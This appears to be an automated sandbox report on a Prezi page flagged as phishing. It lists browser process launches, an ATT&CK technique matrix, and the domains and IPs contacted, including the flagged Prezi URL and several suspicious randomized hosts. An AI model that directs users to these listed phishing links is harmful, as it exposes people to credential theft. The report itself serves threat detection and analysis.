Source: unknownHTTPS traffic detected: 20.12.23.50:443 -> 192.168.2.17:50029 version: TLS 1.2
Source: unknownHTTPS traffic detected: 13.107.5.88:443 -> 192.168.2.17:50115 version: TLS 1.2
Source: unknownHTTPS traffic detected: 40.126.32.133:443 -> 192.168.2.17:50113 version: TLS 1.2
Source: unknownHTTPS traffic detected: 2.23.209.158:443 -> 192.168.2.17:50117 version: TLS 1.2
Source: classification engineClassification label: mal48.phis.win@39/139@266/1183
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps
Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2100 --field-trial-handle=2020,i,12109441241390302086,6426292447797102329,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://prezi.com/i/amopqalyrbyv/"
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2100 --field-trial-handle=2020,i,12109441241390302086,6426292447797102329,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: Window RecorderWindow detected: More than 3 window changes detected

Persistence and Installation Behavior

barindex
Source: https://prezi.com/i/amopqalyrbyv/jennifer-zisk-vitron-msw-lsw/LLM: Page contains button: 'CLICK HERE TO VIEW DOCUMENTS ONLINE' Source: '1.7.pages.csv'
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnk
ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire Infrastructure1
Drive-by Compromise
Windows Management Instrumentation1
Browser Extensions
1
Process Injection
1
Masquerading
OS Credential DumpingSystem Service DiscoveryRemote ServicesData from Local System2
Encrypted Channel
Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault AccountsScheduled Task/Job1
Registry Run Keys / Startup Folder
1
Registry Run Keys / Startup Folder
1
Process Injection
LSASS MemoryApplication Window DiscoveryRemote Desktop ProtocolData from Removable Media1
Non-Application Layer Protocol
Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
Extra Window Memory Injection
1
Extra Window Memory Injection
Security Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared Drive2
Application Layer Protocol
Automated ExfiltrationData Encrypted for Impact

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand
SourceDetectionScannerLabelLink
https://prezi.com/i/amopqalyrbyv/0%Avira URL Cloudsafe
No Antivirus matches
No Antivirus matches
No Antivirus matches
No Antivirus matches
NameIPActiveMaliciousAntivirus DetectionReputation
tls13.taboola.map.fastly.net
151.101.129.44
truefalse
    unknown
    prezigram-assets.prezicdn.net
    18.155.129.80
    truefalse
      unknown
      cnstrc.com
      99.86.4.29
      truefalse
        high
        ohp.jubilant10.com
        104.21.63.134
        truefalse
          unknown
          stats.g.doubleclick.net
          64.233.167.157
          truefalse
            high
            track.hubspot.com
            104.16.118.116
            truefalse
              high
              dualstack.tls13.taboola.map.fastly.net
              151.101.193.44
              truefalse
                unknown
                js.hs-scripts.com
                104.16.139.209
                truefalse
                  high
                  cdnjs.cloudflare.com
                  104.17.25.14
                  truefalse
                    high
                    stripe.com
                    18.202.131.124
                    truefalse
                      high
                      www.google.com
                      142.250.185.228
                      truefalse
                        high
                        js-cdn.dynatrace.com
                        18.244.18.100
                        truefalse
                          high
                          d2pj2twnjx3fya.cloudfront.net
                          18.66.121.144
                          truefalse
                            unknown
                            js.hs-banner.com
                            172.64.147.16
                            truefalse
                              high
                              star-mini.c10r.facebook.com
                              157.240.251.35
                              truefalse
                                high
                                google.com
                                142.250.184.238
                                truefalse
                                  high
                                  cdn-prezi.jifo.co
                                  172.67.11.199
                                  truefalse
                                    unknown
                                    dycxm6nnyo2aj.cloudfront.net
                                    108.156.60.86
                                    truefalse
                                      high
                                      d1zvw2klwdlloe.cloudfront.net
                                      18.66.122.62
                                      truefalse
                                        unknown
                                        us-cds.taboola.com
                                        141.226.224.32
                                        truefalse
                                          unknown
                                          gke-ingress.bluecore.com
                                          35.190.19.88
                                          truefalse
                                            unknown
                                            stripecdn.map.fastly.net
                                            151.101.192.176
                                            truefalse
                                              high
                                              cdn.optimizely.com
                                              104.18.66.57
                                              truefalse
                                                high
                                                asos.com.ssl.d3.sc.omtrdc.net
                                                63.140.62.222
                                                truefalse
                                                  unknown
                                                  analytics-alv.google.com
                                                  216.239.32.181
                                                  truefalse
                                                    high
                                                    googleads.g.doubleclick.net
                                                    142.250.185.226
                                                    truefalse
                                                      high
                                                      m.stripe.com
                                                      52.37.187.26
                                                      truefalse
                                                        high
                                                        s2-cloudinary-pin-sni.map.fastly.net
                                                        151.101.130.92
                                                        truefalse
                                                          unknown
                                                          challenges.cloudflare.com
                                                          104.18.95.41
                                                          truefalse
                                                            high
                                                            td.doubleclick.net
                                                            142.250.185.130
                                                            truefalse
                                                              high
                                                              prezi.com
                                                              75.2.83.248
                                                              truefalse
                                                                unknown
                                                                e309da9b9aaf.cdn4.forter.com
                                                                18.173.205.106
                                                                truefalse
                                                                  high
                                                                  cdn.cookielaw.org
                                                                  104.18.87.42
                                                                  truefalse
                                                                    high
                                                                    d3rwxsx3brl7p6.cloudfront.net
                                                                    99.86.4.124
                                                                    truefalse
                                                                      unknown
                                                                      js.hs-analytics.net
                                                                      104.16.160.168
                                                                      truefalse
                                                                        high
                                                                        ju9jakkaoumuzm8sin6wwcxb6gmzhr5hvnqxopdcjsgb8bbuyjrdofootuuv.diblethe.com
                                                                        188.114.97.3
                                                                        truefalse
                                                                          unknown
                                                                          prezi-analytics.com
                                                                          99.83.220.209
                                                                          truefalse
                                                                            unknown
                                                                            scontent.xx.fbcdn.net
                                                                            157.240.253.1
                                                                            truefalse
                                                                              high
                                                                              code.jquery.com
                                                                              151.101.194.137
                                                                              truefalse
                                                                                high
                                                                                apbqrjhmudzxqujc0mfaeugbu2kfxg3raxvemzkyauzfcu9pml9fujy3fg.ndshalox.com
                                                                                172.67.191.170
                                                                                truefalse
                                                                                  unknown
                                                                                  bandar-logger.prezi.com
                                                                                  18.209.183.151
                                                                                  truefalse
                                                                                    unknown
                                                                                    dcs-public-edge-irl1-150041215.eu-west-1.elb.amazonaws.com
                                                                                    34.250.135.63
                                                                                    truefalse
                                                                                      high
                                                                                      am-vip001.taboola.com
                                                                                      141.226.228.48
                                                                                      truefalse
                                                                                        high
                                                                                        a.nel.cloudflare.com
                                                                                        35.190.80.1
                                                                                        truefalse
                                                                                          high
                                                                                          ax-0001.ax-msedge.net
                                                                                          150.171.27.10
                                                                                          truefalse
                                                                                            high
                                                                                            p6jxo9bkndjpbsiorlfxmbhwxbuxwqetaeiowr4duumwcvnoj91x.belonfal.com
                                                                                            188.114.96.3
                                                                                            truefalse
                                                                                              unknown
                                                                                              dexeqbeb7giwr.cloudfront.net
                                                                                              18.239.50.70
                                                                                              truefalse
                                                                                                unknown
                                                                                                d3aeorqw7ononu.cloudfront.net
                                                                                                99.86.4.113
                                                                                                truefalse
                                                                                                  unknown
                                                                                                  geolocation.onetrust.com
                                                                                                  104.18.32.137
                                                                                                  truefalse
                                                                                                    high
                                                                                                    ci.asosservices.com
                                                                                                    unknown
                                                                                                    unknownfalse
                                                                                                      high
                                                                                                      api.bluecore.com
                                                                                                      unknown
                                                                                                      unknownfalse
                                                                                                        high
                                                                                                        assets1.prezicdn.net
                                                                                                        unknown
                                                                                                        unknownfalse
                                                                                                          unknown
                                                                                                          asos.demdex.net
                                                                                                          unknown
                                                                                                          unknownfalse
                                                                                                            high
                                                                                                            res.cloudinary.com
                                                                                                            unknown
                                                                                                            unknownfalse
                                                                                                              high
                                                                                                              s2.go-mpulse.net
                                                                                                              unknown
                                                                                                              unknownfalse
                                                                                                                high
                                                                                                                assets.adobedtm.com
                                                                                                                unknown
                                                                                                                unknownfalse
                                                                                                                  high
                                                                                                                  trc.taboola.com
                                                                                                                  unknown
                                                                                                                  unknownfalse
                                                                                                                    high
                                                                                                                    connect.facebook.net
                                                                                                                    unknown
                                                                                                                    unknownfalse
                                                                                                                      high
                                                                                                                      px.ads.linkedin.com
                                                                                                                      unknown
                                                                                                                      unknownfalse
                                                                                                                        high
                                                                                                                        cdn.taboola.com
                                                                                                                        unknown
                                                                                                                        unknownfalse
                                                                                                                          high
                                                                                                                          www.asos-video.com
                                                                                                                          unknown
                                                                                                                          unknownfalse
                                                                                                                            unknown
                                                                                                                            reporting.go-mpulse.net
                                                                                                                            unknown
                                                                                                                            unknownfalse
                                                                                                                              high
                                                                                                                              js.stripe.com
                                                                                                                              unknown
                                                                                                                              unknownfalse
                                                                                                                                high
                                                                                                                                pips.taboola.com
                                                                                                                                unknown
                                                                                                                                unknownfalse
                                                                                                                                  high
                                                                                                                                  sephora-track.inside-graph.com
                                                                                                                                  unknown
                                                                                                                                  unknownfalse
                                                                                                                                    unknown
                                                                                                                                    psb.taboola.com
                                                                                                                                    unknown
                                                                                                                                    unknownfalse
                                                                                                                                      high
                                                                                                                                      m.stripe.network
                                                                                                                                      unknown
                                                                                                                                      unknownfalse
                                                                                                                                        high
                                                                                                                                        images.asos-media.com
                                                                                                                                        unknown
                                                                                                                                        unknownfalse
                                                                                                                                          high
                                                                                                                                          www.sephora.com
                                                                                                                                          unknown
                                                                                                                                          unknownfalse
                                                                                                                                            high
                                                                                                                                            www.asos.com
                                                                                                                                            unknown
                                                                                                                                            unknownfalse
                                                                                                                                              high
                                                                                                                                              assets.prezicdn.net
                                                                                                                                              unknown
                                                                                                                                              unknownfalse
                                                                                                                                                unknown
                                                                                                                                                trc-events.taboola.com
                                                                                                                                                unknown
                                                                                                                                                unknownfalse
                                                                                                                                                  high
                                                                                                                                                  cds.taboola.com
                                                                                                                                                  unknown
                                                                                                                                                  unknownfalse
                                                                                                                                                    unknown
                                                                                                                                                    metrics.asos.com
                                                                                                                                                    unknown
                                                                                                                                                    unknownfalse
                                                                                                                                                      high
                                                                                                                                                      creativeassets.asosservices.com
                                                                                                                                                      unknown
                                                                                                                                                      unknownfalse
                                                                                                                                                        high
                                                                                                                                                        dpm.demdex.net
                                                                                                                                                        unknown
                                                                                                                                                        unknownfalse
                                                                                                                                                          high
                                                                                                                                                          package-bundles.prezi.com
                                                                                                                                                          unknown
                                                                                                                                                          unknownfalse
                                                                                                                                                            unknown
                                                                                                                                                            my.asos.com
                                                                                                                                                            unknown
                                                                                                                                                            unknownfalse
                                                                                                                                                              unknown
                                                                                                                                                              resources.asosservices.com
                                                                                                                                                              unknown
                                                                                                                                                              unknownfalse
                                                                                                                                                                high
                                                                                                                                                                www.facebook.com
                                                                                                                                                                unknown
                                                                                                                                                                unknownfalse
                                                                                                                                                                  high
                                                                                                                                                                  sephora.demdex.net
                                                                                                                                                                  unknown
                                                                                                                                                                  unknownfalse
                                                                                                                                                                    high
                                                                                                                                                                    www.linkedin.com
                                                                                                                                                                    unknown
                                                                                                                                                                    unknownfalse
                                                                                                                                                                      high
                                                                                                                                                                      www.asosglobal.com
                                                                                                                                                                      unknown
                                                                                                                                                                      unknownfalse
                                                                                                                                                                        high
                                                                                                                                                                        assets.asosservices.com
                                                                                                                                                                        unknown
                                                                                                                                                                        unknownfalse
                                                                                                                                                                          high
                                                                                                                                                                          community.sephora.com
                                                                                                                                                                          unknown
                                                                                                                                                                          unknownfalse
                                                                                                                                                                            high
                                                                                                                                                                            snap.licdn.com
                                                                                                                                                                            unknown
                                                                                                                                                                            unknownfalse
                                                                                                                                                                              high
                                                                                                                                                                              content.asos-media.com
                                                                                                                                                                              unknown
                                                                                                                                                                              unknownfalse
                                                                                                                                                                                high
                                                                                                                                                                                analytics.tiktok.com
                                                                                                                                                                                unknown
                                                                                                                                                                                unknownfalse
                                                                                                                                                                                  high
                                                                                                                                                                                  analytics.google.com
                                                                                                                                                                                  unknown
                                                                                                                                                                                  unknownfalse
                                                                                                                                                                                    high
                                                                                                                                                                                    c.go-mpulse.net
                                                                                                                                                                                    unknown
                                                                                                                                                                                    unknownfalse
                                                                                                                                                                                      high
                                                                                                                                                                                      NameMaliciousAntivirus DetectionReputation
                                                                                                                                                                                      https://ohp.jubilant10.com/9AcwW8rx6XRE_VpnT9ifNcc/false
                                                                                                                                                                                        unknown
                                                                                                                                                                                        https://www.asos.com/false
                                                                                                                                                                                          high
                                                                                                                                                                                          https://prezi.com/i/amopqalyrbyv/jennifer-zisk-vitron-msw-lsw/true
                                                                                                                                                                                            unknown
                                                                                                                                                                                            https://www.sephora.com/false
                                                                                                                                                                                              high
                                                                                                                                                                                              • No. of IPs < 25%
                                                                                                                                                                                              • 25% < No. of IPs < 50%
                                                                                                                                                                                              • 50% < No. of IPs < 75%
                                                                                                                                                                                              • 75% < No. of IPs
                                                                                                                                                                                              IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                                                              142.250.185.228
                                                                                                                                                                                              www.google.comUnited States
                                                                                                                                                                                              15169GOOGLEUSfalse
                                                                                                                                                                                              142.250.185.100
                                                                                                                                                                                              unknownUnited States
                                                                                                                                                                                              15169GOOGLEUSfalse
                                                                                                                                                                                              142.250.185.226
                                                                                                                                                                                              googleads.g.doubleclick.netUnited States
                                                                                                                                                                                              15169GOOGLEUSfalse
                                                                                                                                                                                              104.16.139.209
                                                                                                                                                                                              js.hs-scripts.comUnited States
                                                                                                                                                                                              13335CLOUDFLARENETUSfalse
                                                                                                                                                                                              104.16.118.116
                                                                                                                                                                                              track.hubspot.comUnited States
                                                                                                                                                                                              13335CLOUDFLARENETUSfalse
                                                                                                                                                                                              142.251.168.84
                                                                                                                                                                                              unknownUnited States
                                                                                                                                                                                              15169GOOGLEUSfalse
                                                                                                                                                                                              172.64.146.215
                                                                                                                                                                                              unknownUnited States
                                                                                                                                                                                              13335CLOUDFLARENETUSfalse
                                                                                                                                                                                              35.190.80.1
                                                                                                                                                                                              a.nel.cloudflare.comUnited States
                                                                                                                                                                                              15169GOOGLEUSfalse
                                                                                                                                                                                              157.240.252.13
                                                                                                                                                                                              unknownUnited States
                                                                                                                                                                                              32934FACEBOOKUSfalse
                                                                                                                                                                                              104.102.38.212
                                                                                                                                                                                              unknownUnited States
                                                                                                                                                                                              16625AKAMAI-ASUSfalse
                                                                                                                                                                                              151.101.193.44
                                                                                                                                                                                              dualstack.tls13.taboola.map.fastly.netUnited States
                                                                                                                                                                                              54113FASTLYUSfalse
                                                                                                                                                                                              104.18.87.42
                                                                                                                                                                                              cdn.cookielaw.orgUnited States
                                                                                                                                                                                              13335CLOUDFLARENETUSfalse
                                                                                                                                                                                              1.1.1.1
                                                                                                                                                                                              unknownAustralia
                                                                                                                                                                                              13335CLOUDFLARENETUSfalse
                                                                                                                                                                                              74.125.133.84
                                                                                                                                                                                              unknownUnited States
                                                                                                                                                                                              15169GOOGLEUSfalse
                                                                                                                                                                                              18.155.129.80
                                                                                                                                                                                              prezigram-assets.prezicdn.netUnited States
                                                                                                                                                                                              16509AMAZON-02USfalse
                                                                                                                                                                                              18.244.18.100
                                                                                                                                                                                              js-cdn.dynatrace.comUnited States
                                                                                                                                                                                              16509AMAZON-02USfalse
                                                                                                                                                                                              157.240.0.35
                                                                                                                                                                                              unknownUnited States
                                                                                                                                                                                              32934FACEBOOKUSfalse
                                                                                                                                                                                              142.250.185.110
                                                                                                                                                                                              unknownUnited States
                                                                                                                                                                                              15169GOOGLEUSfalse
                                                                                                                                                                                              151.101.1.44
                                                                                                                                                                                              unknownUnited States
                                                                                                                                                                                              54113FASTLYUSfalse
                                                                                                                                                                                              2.16.241.75
                                                                                                                                                                                              unknownEuropean Union
                                                                                                                                                                                              20940AKAMAI-ASN1EUfalse
                                                                                                                                                                                              239.255.255.250
                                                                                                                                                                                              unknownReserved
                                                                                                                                                                                              unknownunknownfalse
                                                                                                                                                                                              142.250.185.196
                                                                                                                                                                                              unknownUnited States
                                                                                                                                                                                              15169GOOGLEUSfalse
                                                                                                                                                                                              151.101.65.44
                                                                                                                                                                                              unknownUnited States
                                                                                                                                                                                              54113FASTLYUSfalse
                                                                                                                                                                                              35.190.19.88
                                                                                                                                                                                              gke-ingress.bluecore.comUnited States
                                                                                                                                                                                              15169GOOGLEUSfalse
                                                                                                                                                                                              88.221.110.227
                                                                                                                                                                                              unknownEuropean Union
                                                                                                                                                                                              20940AKAMAI-ASN1EUfalse
                                                                                                                                                                                              18.66.121.144
                                                                                                                                                                                              d2pj2twnjx3fya.cloudfront.netUnited States
                                                                                                                                                                                              3MIT-GATEWAYSUSfalse
                                                                                                                                                                                              52.213.0.145
                                                                                                                                                                                              unknownUnited States
                                                                                                                                                                                              16509AMAZON-02USfalse
                                                                                                                                                                                              2.23.196.103
                                                                                                                                                                                              unknownEuropean Union
                                                                                                                                                                                              1273CWVodafoneGroupPLCEUfalse
                                                                                                                                                                                              151.101.192.176
                                                                                                                                                                                              stripecdn.map.fastly.netUnited States
                                                                                                                                                                                              54113FASTLYUSfalse
                                                                                                                                                                                              34.250.135.63
                                                                                                                                                                                              dcs-public-edge-irl1-150041215.eu-west-1.elb.amazonaws.comUnited States
                                                                                                                                                                                              16509AMAZON-02USfalse
                                                                                                                                                                                              99.86.4.124
                                                                                                                                                                                              d3rwxsx3brl7p6.cloudfront.netUnited States
                                                                                                                                                                                              16509AMAZON-02USfalse
                                                                                                                                                                                              64.233.167.157
                                                                                                                                                                                              stats.g.doubleclick.netUnited States
                                                                                                                                                                                              15169GOOGLEUSfalse
                                                                                                                                                                                              216.58.212.164
                                                                                                                                                                                              unknownUnited States
                                                                                                                                                                                              15169GOOGLEUSfalse
                                                                                                                                                                                              104.21.68.72
                                                                                                                                                                                              unknownUnited States
                                                                                                                                                                                              13335CLOUDFLARENETUSfalse
                                                                                                                                                                                              142.250.186.130
                                                                                                                                                                                              unknownUnited States
                                                                                                                                                                                              15169GOOGLEUSfalse
                                                                                                                                                                                              142.250.181.232
                                                                                                                                                                                              unknownUnited States
                                                                                                                                                                                              15169GOOGLEUSfalse
                                                                                                                                                                                              74.125.206.84
                                                                                                                                                                                              unknownUnited States
                                                                                                                                                                                              15169GOOGLEUSfalse
                                                                                                                                                                                              2.16.241.86
                                                                                                                                                                                              unknownEuropean Union
                                                                                                                                                                                              20940AKAMAI-ASN1EUfalse
                                                                                                                                                                                              142.250.181.238
                                                                                                                                                                                              unknownUnited States
                                                                                                                                                                                              15169GOOGLEUSfalse
                                                                                                                                                                                              2.16.241.87
                                                                                                                                                                                              unknownEuropean Union
                                                                                                                                                                                              20940AKAMAI-ASN1EUfalse
                                                                                                                                                                                              99.86.4.29
                                                                                                                                                                                              cnstrc.comUnited States
                                                                                                                                                                                              16509AMAZON-02USfalse
                                                                                                                                                                                              172.64.147.16
                                                                                                                                                                                              js.hs-banner.comUnited States
                                                                                                                                                                                              13335CLOUDFLARENETUSfalse
                                                                                                                                                                                              18.173.205.106
                                                                                                                                                                                              e309da9b9aaf.cdn4.forter.comUnited States
                                                                                                                                                                                              3MIT-GATEWAYSUSfalse
                                                                                                                                                                                              141.226.228.48
                                                                                                                                                                                              am-vip001.taboola.comIsrael
                                                                                                                                                                                              200478TABOOLA-ASILfalse
                                                                                                                                                                                              142.250.186.131
                                                                                                                                                                                              unknownUnited States
                                                                                                                                                                                              15169GOOGLEUSfalse
                                                                                                                                                                                              216.58.212.174
                                                                                                                                                                                              unknownUnited States
                                                                                                                                                                                              15169GOOGLEUSfalse
                                                                                                                                                                                              2.16.100.18
                                                                                                                                                                                              unknownEuropean Union
                                                                                                                                                                                              20940AKAMAI-ASN1EUfalse
                                                                                                                                                                                              66.102.1.84
                                                                                                                                                                                              unknownUnited States
                                                                                                                                                                                              15169GOOGLEUSfalse
                                                                                                                                                                                              75.2.83.248
                                                                                                                                                                                              prezi.comUnited States
                                                                                                                                                                                              16509AMAZON-02USfalse
                                                                                                                                                                                              18.66.102.64
                                                                                                                                                                                              unknownUnited States
                                                                                                                                                                                              3MIT-GATEWAYSUSfalse
                                                                                                                                                                                              104.17.24.14
                                                                                                                                                                                              unknownUnited States
                                                                                                                                                                                              13335CLOUDFLARENETUSfalse
                                                                                                                                                                                              2.23.196.132
                                                                                                                                                                                              unknownEuropean Union
                                                                                                                                                                                              1273CWVodafoneGroupPLCEUfalse
                                                                                                                                                                                              52.37.187.26
                                                                                                                                                                                              m.stripe.comUnited States
                                                                                                                                                                                              16509AMAZON-02USfalse
                                                                                                                                                                                              104.18.4.177
                                                                                                                                                                                              unknownUnited States
                                                                                                                                                                                              13335CLOUDFLARENETUSfalse
                                                                                                                                                                                              54.187.35.154
                                                                                                                                                                                              unknownUnited States
                                                                                                                                                                                              16509AMAZON-02USfalse
                                                                                                                                                                                              150.171.27.10
                                                                                                                                                                                              ax-0001.ax-msedge.netUnited States
                                                                                                                                                                                              8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                                                                                                                                                              157.240.253.1
                                                                                                                                                                                              scontent.xx.fbcdn.netUnited States
                                                                                                                                                                                              32934FACEBOOKUSfalse
                                                                                                                                                                                              188.114.96.3
                                                                                                                                                                                              p6jxo9bkndjpbsiorlfxmbhwxbuxwqetaeiowr4duumwcvnoj91x.belonfal.comEuropean Union
                                                                                                                                                                                              13335CLOUDFLARENETUSfalse
                                                                                                                                                                                              2.16.241.93
                                                                                                                                                                                              unknownEuropean Union
                                                                                                                                                                                              20940AKAMAI-ASN1EUfalse
                                                                                                                                                                                              18.66.122.62
                                                                                                                                                                                              d1zvw2klwdlloe.cloudfront.netUnited States
                                                                                                                                                                                              3MIT-GATEWAYSUSfalse
                                                                                                                                                                                              184.27.96.174
                                                                                                                                                                                              unknownUnited States
                                                                                                                                                                                              7016CCCH-3USfalse
                                                                                                                                                                                              18.66.121.214
                                                                                                                                                                                              unknownUnited States
                                                                                                                                                                                              3MIT-GATEWAYSUSfalse
                                                                                                                                                                                              99.86.4.51
                                                                                                                                                                                              unknownUnited States
                                                                                                                                                                                              16509AMAZON-02USfalse
                                                                                                                                                                                              54.77.102.52
                                                                                                                                                                                              unknownUnited States
                                                                                                                                                                                              16509AMAZON-02USfalse
                                                                                                                                                                                              2.18.64.21
                                                                                                                                                                                              unknownEuropean Union
                                                                                                                                                                                              6057AdministracionNacionaldeTelecomunicacionesUYfalse
                                                                                                                                                                                              104.18.32.137
                                                                                                                                                                                              geolocation.onetrust.comUnited States
                                                                                                                                                                                              13335CLOUDFLARENETUSfalse
                                                                                                                                                                                              63.140.62.222
                                                                                                                                                                                              asos.com.ssl.d3.sc.omtrdc.netUnited States
                                                                                                                                                                                              15224OMNITUREUSfalse
                                                                                                                                                                                              104.22.57.142
                                                                                                                                                                                              unknownUnited States
                                                                                                                                                                                              13335CLOUDFLARENETUSfalse
                                                                                                                                                                                              18.239.50.70
                                                                                                                                                                                              dexeqbeb7giwr.cloudfront.netUnited States
                                                                                                                                                                                              16509AMAZON-02USfalse
                                                                                                                                                                                              151.101.66.137
                                                                                                                                                                                              unknownUnited States
                                                                                                                                                                                              54113FASTLYUSfalse
                                                                                                                                                                                              104.21.63.134
                                                                                                                                                                                              ohp.jubilant10.comUnited States
                                                                                                                                                                                              13335CLOUDFLARENETUSfalse
                                                                                                                                                                                              88.221.110.136
                                                                                                                                                                                              unknownEuropean Union
                                                                                                                                                                                              20940AKAMAI-ASN1EUfalse
                                                                                                                                                                                              142.250.184.195
                                                                                                                                                                                              unknownUnited States
                                                                                                                                                                                              15169GOOGLEUSfalse
                                                                                                                                                                                              18.209.183.151
                                                                                                                                                                                              bandar-logger.prezi.comUnited States
                                                                                                                                                                                              14618AMAZON-AESUSfalse
                                                                                                                                                                                              99.86.4.113
                                                                                                                                                                                              d3aeorqw7ononu.cloudfront.netUnited States
                                                                                                                                                                                              16509AMAZON-02USfalse
                                                                                                                                                                                              2.18.64.15
                                                                                                                                                                                              unknownEuropean Union
                                                                                                                                                                                              6057AdministracionNacionaldeTelecomunicacionesUYfalse
                                                                                                                                                                                              99.83.220.209
                                                                                                                                                                                              prezi-analytics.comUnited States
                                                                                                                                                                                              16509AMAZON-02USfalse
                                                                                                                                                                                              216.239.32.181
                                                                                                                                                                                              analytics-alv.google.comUnited States
                                                                                                                                                                                              15169GOOGLEUSfalse
                                                                                                                                                                                              104.18.95.41
                                                                                                                                                                                              challenges.cloudflare.comUnited States
                                                                                                                                                                                              13335CLOUDFLARENETUSfalse
                                                                                                                                                                                              3.160.150.64
                                                                                                                                                                                              unknownUnited States
                                                                                                                                                                                              16509AMAZON-02USfalse
                                                                                                                                                                                              172.64.155.119
                                                                                                                                                                                              unknownUnited States
                                                                                                                                                                                              13335CLOUDFLARENETUSfalse
                                                                                                                                                                                              13.107.42.14
                                                                                                                                                                                              unknownUnited States
                                                                                                                                                                                              8068MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                                                                                                                                                              142.250.186.106
                                                                                                                                                                                              unknownUnited States
                                                                                                                                                                                              15169GOOGLEUSfalse
                                                                                                                                                                                              104.17.175.201
